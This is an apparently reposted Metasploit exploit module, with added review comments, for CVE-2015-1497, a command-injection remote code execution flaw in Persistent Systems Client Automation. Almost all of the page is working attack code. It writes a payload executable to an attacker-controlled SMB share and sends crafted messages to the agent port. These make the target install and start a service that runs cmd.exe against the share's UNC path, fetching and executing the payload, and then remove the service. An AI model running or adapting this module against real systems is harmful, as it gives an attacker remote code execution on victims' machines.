
自动化命令注入RCE

2015/3/11 作者:不详 来源: 华盟收集

 

 

 

 

 

 

 

 

 

 

 

# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previously HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10

require 'msf/core'

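# Exploit flow, as implemented below:
#   1. Generate the payload EXE and write it to an attacker-controlled SMB
#      share (SMBServer/SMBShare) using the SMB client mixin.
#   2. Re-open the share and confirm the file is there.
#   3. Open a raw TCP session to RHOST:RPORT (default 3465, presumably the
#      PSCA agent listener) and send three framed messages that make Nvdkit
#      install, start and then remove a service whose -path is
#      "cmd.exe /c \\SMBServer\SMBShare\installservice.exe".
# The target therefore fetches and runs the payload over SMB from the
# SMBServer host: that host must be reachable from the target, and the share
# must be writable with the credentials the SMB mixin logs in with.
#
# Review notes on the original version of this module:
#   * abort() was used on failure, which exits the whole framework process;
#     fail_with() is used instead so only this run stops.
#   * RHOST/RPORT were rewritten to point at the SMB server and only restored
#     on the success path; restoration now happens in an ensure block.
#   * `rescue ::Exception` hid every error behind a "Could not connect" text.
#   * A failed upload check only printed an error and the service commands
#     were still sent; it is now a hard failure.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::SMB
  include Msf::Exploit::EXE
  include Msf::Auxiliary::Report

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::Client
  XCEPT  = Rex::Proto::SMB::Exceptions
  CONST  = Rex::Proto::SMB::Constants

  # Every message sent to the agent port is framed as
  # MSG_HEADER + command + MSG_TRAILER. The header is "\x00$MACHINE\x00",
  # eight spaces and a NUL; the trailer is a 0x22 byte and three NULs. The
  # meaning of the individual bytes is not documented here -- they are kept
  # exactly as in the original capture.
  MSG_HEADER  = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00".freeze
  MSG_TRAILER = "\x22\x00\x00\x00".freeze

  # Name of the service created on the target and of the payload file dropped
  # on the share. Install, start, remove and the upload all have to agree on
  # these, so they live in one place. NOTE(review): a fixed service name will
  # collide with any existing service called "test" and is an easy detection
  # artifact; the original module hard-coded it and that is preserved here.
  SERVICE_NAME = 'test'.freeze
  PAYLOAD_NAME = 'installservice.exe'.freeze

  # Seconds to wait after the install command before starting the service,
  # and after the start command before removing it (the callback must have
  # fired by then).
  START_DELAY  = 5
  REMOVE_DELAY = 30

  def initialize
    super(
      'Name'           => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
      'Description'    => %Q{
        This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
        The payload executable is first written to an attacker-controlled SMB share; the target is then told to
        install and start a service whose path runs cmd.exe against that UNC path, so the target fetches and
        executes the payload over SMB.
      },
      'Author'         => [ 'Ben Turner' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-1497' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'EXITFUNC' => 'process'
        },
      'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {} ]
        ],
      'DefaultTarget'  => 0,
      # NOTE(review): the file header dates the exploit 2014-10-01; this
      # value disagrees with it and is left as originally written.
      'DisclosureDate' => 'January 10 2014'
    )

    register_options(
      [
        OptString.new('SMBServer', [true, 'The IP address of the attacker-controlled SMB server the target will fetch the payload from', '192.168.1.1']),
        OptString.new('SMBShare',  [true, 'The writable share on SMBServer that the payload is dropped into', 'share']),
        Opt::RPORT(3465)
      ], self.class)
  end

  # Entry point: stage the payload on the share, confirm it, then drive the
  # agent through install / start / remove of the injected service.
  def exploit
    upload_payload
    verify_upload

    send_agent_command(install_service_command)
    print_status('Creating the callback payload and installing the remote service')
    sleep(START_DELAY)

    send_agent_command(start_service_command)
    print_good("Exploit sent, awaiting response from service. Waiting #{REMOVE_DELAY} seconds before removing the service")
    sleep(REMOVE_DELAY)

    send_agent_command(remove_service_command)
  end

  private

  # UNC path of the dropped payload exactly as the target will reference it.
  def payload_unc_path
    "\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{PAYLOAD_NAME}"
  end

  # UNC path of the share itself, used for the SMB tree connect.
  def share_unc_path
    "\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}"
  end

  # Wraps one agent command in the fixed header/trailer framing.
  def agent_message(command)
    "#{MSG_HEADER}#{command}#{MSG_TRAILER}"
  end

  # The injected -path value makes the new service run cmd.exe, which fetches
  # and executes the payload from the attacker's share. The command's closing
  # quote plus the 0x22 that opens MSG_TRAILER produce two quote bytes in a
  # row; that is how the original module sent it and is kept unchanged.
  def install_service_command
    "Nvdkit.exe service install #{SERVICE_NAME} -path \"c:\\windows\\system32\\cmd.exe /c #{payload_unc_path}\""
  end

  def start_service_command
    "Nvdkit service start #{SERVICE_NAME}"
  end

  def remove_service_command
    "Nvdkit service remove #{SERVICE_NAME}"
  end

  # Opens a TCP session to RHOST:RPORT, writes one framed message and closes
  # the session. Nothing is read back from the agent, matching the original
  # flow. Connection problems end the run via fail_with rather than killing
  # the framework process.
  def send_agent_command(command)
    connect
    sock.put(agent_message(command))
  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error => e
    fail_with(Failure::Unreachable, "Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}: #{e}")
  ensure
    disconnect
  end

  # Runs the block with RHOST/RPORT temporarily pointed at the attacker's SMB
  # server on 445, after connect + smb_login + tree connect to SMBShare, so the
  # SMB mixin helpers (smb_open, smb_file_exist?) operate on that share. The
  # original RHOST/RPORT are restored and the socket closed even if the block
  # raises, so the following agent-port connect() goes to the real target.
  def with_smb_server
    orig_rport = datastore['RPORT']
    orig_rhost = datastore['RHOST']
    datastore['RPORT'] = 445
    datastore['RHOST'] = datastore['SMBServer']
    connect
    smb_login
    simple.connect(share_unc_path)
    yield
  rescue Rex::Proto::SMB::Exceptions::Error => e
    fail_with(Failure::Unreachable, "Could not connect to the SMB share #{share_unc_path}: #{e}")
  ensure
    disconnect
    datastore['RPORT'] = orig_rport
    datastore['RHOST'] = orig_rhost
  end

  # Generates the payload EXE and writes it to \\SMBServer\SMBShare\PAYLOAD_NAME.
  def upload_payload
    with_smb_server do
      print_status("Generating payload, dropping here: #{payload_unc_path}...")
      exe = generate_payload_exe
      fd = smb_open("\\#{PAYLOAD_NAME}", 'rwct')
      begin
        fd << exe
      ensure
        fd.close
      end
    end
  end

  # Re-opens the share and checks the payload really is there; the agent
  # commands are pointless (and noisy on the target) if it is not.
  def verify_upload
    with_smb_server do
      print_status("Checking the remote share: #{share_unc_path}")
      if smb_file_exist?("\\#{PAYLOAD_NAME}")
        print_good("Found, upload was successful! #{payload_unc_path}")
      else
        fail_with(Failure::NotFound, "#{payload_unc_path} - The file does not exist, try again!")
      end
    end
  end
end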